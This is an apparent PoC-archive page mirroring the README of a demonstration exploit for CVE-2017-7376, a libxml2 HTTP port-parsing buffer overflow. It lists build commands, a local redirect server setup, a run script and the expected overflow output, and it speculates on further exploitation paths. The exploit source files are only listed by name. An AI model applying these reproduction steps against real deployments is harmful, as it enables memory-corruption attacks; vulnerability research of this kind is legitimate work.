Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2017-7376 PoC — libxml2 缓冲区错误漏洞

Source
https://github.com/brahmstaedt/libxml2-exploit
Associated Vulnerability
Title:libxml2 缓冲区错误漏洞 (CVE-2017-7376)
Description:libxml2是GNOME项目组所研发的一个基于C语言的用来解析XML文档的函数库,它支持多种编码格式、Xpath解析、Well-formed和valid验证等。 libxml2中存在缓冲区错误漏洞。远程攻击者可利用该漏洞执行任意代码。
Description
An example exploit for CVE-2017-7376
Readme
# libxml2-exploit
An example exploit for CVE-2017-7376

# Install
Download this repo and a vulnerable version of libxml2, e.g. v2.7.7:
```
git clone https://github.com/brahmstaedt/libxml2-exploit.git
cd libxml2-exploit
wget https://github.com/GNOME/libxml2/archive/v2.7.7.zip
unzip v2.7.7.zip
mv libxml2-2.7.7/ libxml2
```

# Setup

```
cd libxml2
```

## prepare libxml2

To make the success of the exploit more visible, add code to detect the buffer
overflow to libxml2. Not needed, if you have other means of visibility, such
as the application crashing.

```
git apply ../nanohttp.patch
```

## build libxml2

```
./autogen.sh --prefix=$(pwd)/ --without-python
make
make install
```

In case of the following error:
```
aclocal: warning: autoconf input should be named 'configure.ac', not 'configure.in'
```

Replace in configure.in `AM_C_PROTOTYPES` with `dnl AM_C_PROTOTYPES`, e.g. like this:
```
sed 's:AM_C_PROTOTYPES:dnl AM_C_PROTOTYPES:' configure.in -i
```

Go back
```
cd ..
```

## prepare web server
This exploit requires a web server responding with a redirect to a new URL with
a port number greater than 5 digits an below int32max (2147483648 = 2^32/2).

Start server (requires node JS and port 127.0.0.1:8080 to be unused):
```
node http.js &
```

Test web server; should complain about invalid port number 2147426192:
```
wget localhost:8080
```

# Compile

```
make
```

# Run
```
./run.sh
```

Expected output:
```
Buffer overflow is detected
I/O warning : failed to load HTTP resource
buffer_overflow.xml:4: element include: XInclude error : could not load http://localhost:8080/dummy.xml, and no fallback was found
Failed to process include buffer_overflow.xml
```

# To Do
This demo exploit requires the main program to execute `xmlXIncludeProcess()` to reach the faulty code in
libxml2, which is not likely used in many actual implementations. But then nanohttp.c mentions in the comment
that it is a `minimalist HTTP GET implementation to fetch external subsets` which may offer another path of exploitation.
File Snapshot

 [4.0K]  /data/pocs/50fd7cf8050b1f0bf2a37bcd2f68d0f64a6aaaf6
├── [ 254]  buffer_overflow.xml
├── [ 165]  http.js
├── [1.0K]  LICENSE
├── [ 989]  main.c
├── [ 102]  Makefile
├── [ 396]  nanohttp.patch
├── [2.0K]  README.md
└── [  79]  run.sh

0 directories, 8 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.